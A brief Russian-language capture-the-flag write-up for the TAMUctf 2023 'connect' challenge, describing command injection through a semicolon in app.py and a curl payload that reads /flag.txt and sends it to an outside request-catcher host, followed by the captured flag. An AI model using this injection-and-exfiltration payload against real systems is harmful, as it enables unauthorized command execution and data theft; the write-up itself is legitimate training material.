TAMUctf 2023 — запись о подключении
May 01 2023
Эта задача создана мистером Блейдом. Загрузите соединение.
Этот вызов создан мистером Блейдом.
Загрузите файл connect.zip. У нас есть app.py
Я изменил это так, чтобы я мог запускать и тестировать его локально.

Мы можем добавить больше команд, добавив ; .
Я создал ловушку запросов сhttps://requestcatcher.com/чтобы зафиксировать запрос.
Давайте сделаем внедрение команды, добавив ; curl -s https://flag.requestcatcher.com/$(cat/flag.txt)
Путь флага упоминается в описании задачи.

Я использовал burp, и URL закодировал полезную нагрузку. Посмотрим на ловушку запросов.

Флаг: gigem{p00r_f1lt3rs_m4k3_f0r_p00r_s3cur1ty}.
Спасибо за прочтение.
Удачного взлома!